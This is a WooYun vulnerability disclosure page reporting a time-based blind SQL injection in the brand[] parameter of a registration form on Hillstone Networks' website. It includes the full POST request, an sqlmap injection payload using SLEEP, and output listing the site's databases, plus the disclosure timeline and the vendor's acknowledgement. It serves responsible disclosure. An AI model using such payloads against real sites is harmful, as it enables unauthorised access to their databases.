当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168398

漏洞标题:山石网科WWW主站存在SQL注入漏洞(可影响2个数据库)

相关厂商:hillstonenet.com.cn

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2016-01-08 21:30

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-08: 细节已通知厂商并且等待厂商处理中
2016-01-08: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向核心白帽子及相关领域专家公开
2016-01-28: 细节向普通白帽子公开
2016-02-07: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

看见你们的招聘信息了 就好奇的测试了下 ···

详细说明:

POST数据包:

POST /pub/iNGFWtest/register.php HTTP/1.1
Content-Length: 552
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.hillstonenet.com.cn:80/
Cookie: lc8_sid=wzNkuS; PHPSESSID=tnt4a2du63440nmb3fhj9f3hr6; lc8_oldtopics=D2206D1476D907D2274D71D; lc8_visitedfid=43D15D16D17D41; ndIz_2132_saltkey=ozV4Ig0K; ndIz_2132_lastvisit=1452227947; ndIz_2132_sid=Shmv2X; ndIz_2132_lastact=1452231547%09forum.php%09; phpcms_searchtime=1452231547
Host: www.hillstonenet.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
brand%5b%5d=*&company=Acunetix&configable=%e7%86%9f%e7%bb%83&credentiales%5b%5d=CCNA&[email protected]&environment=%e7%8e%b0%e7%bd%91%e6%b5%81%e9%87%8f%e7%8e%af%e5%a2%83&equipment%5b%5d=%e4%b8%8b%e4%b8%80%e4%bb%a3%e9%98%b2%e7%81%ab%e5%a2%99&experience=1-3&hangye=%e6%94%bf%e5%ba%9c&media%5b%5d=%e6%96%b0%e6%b5%aa%e5%be%ae%e5%8d%9a&renshu=100%e4%ba%ba%e4%bb%a5%e4%b8%8b&shipin=%e6%98%af&tel=555-666-0606&username=admin


第一个参数 brand[] 可注入

0.png


基于延时注入 太慢了 就不跑了 hillstonenet 26张表

1.png


漏洞证明:

sqlmap identified the following injection point(s) with a total of 181 HTTP(s) r
equests:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: brand[]=(select(0)from(select(sleep(0)))v)/' AND (SELECT * FROM (SE
LECT(SLEEP(5)))OdMr) AND 'HqPD'='HqPD'+(select(0)from(select(sleep(0)))v)+'"+(se
lect(0)from(select(sleep(0)))v)+"/&company=Acunetix&configable=%e7%86%9f%e7%bb%8
3&credentiales[]=CCNA&[email protected]&environment=%e7%8e%b0%e7%bd%91%e6%b5%81
%e9%87%8f%e7%8e%af%e5%a2%83&equipment[]=%e4%b8%8b%e4%b8%80%e4%bb%a3%e9%98%b2%e7%
81%ab%e5%a2%99&experience=1-3&hangye=%e6%94%bf%e5%ba%9c&media[]=%e6%96%b0%e6%b5%
aa%e5%be%ae%e5%8d%9a&renshu=100%e4%ba%ba%e4%bb%a5%e4%b8%8b&shipin=%e6%98%af&tel=
555-666-0606&username=admin
---
[13:54:09] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
[13:54:09] [INFO] fetching database names
[13:54:09] [INFO] fetching number of databases
[13:54:09] [INFO] retrieved:
[13:54:09] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
2
[13:54:22] [INFO] retrieved:
[13:54:27] [INFO] adjusting time delay to 2 seconds due to good response times
information_schema
[13:57:06] [INFO] retrieved: hillstonenet
available databases [2]:
[*] hillstonenet
[*] information_schema
[13:59:06] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.hillstonenet.com.cn'
[*] shutting down at 13:59:06

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2016-01-08 22:42

厂商回复:

谢谢提醒

最新状态:

暂无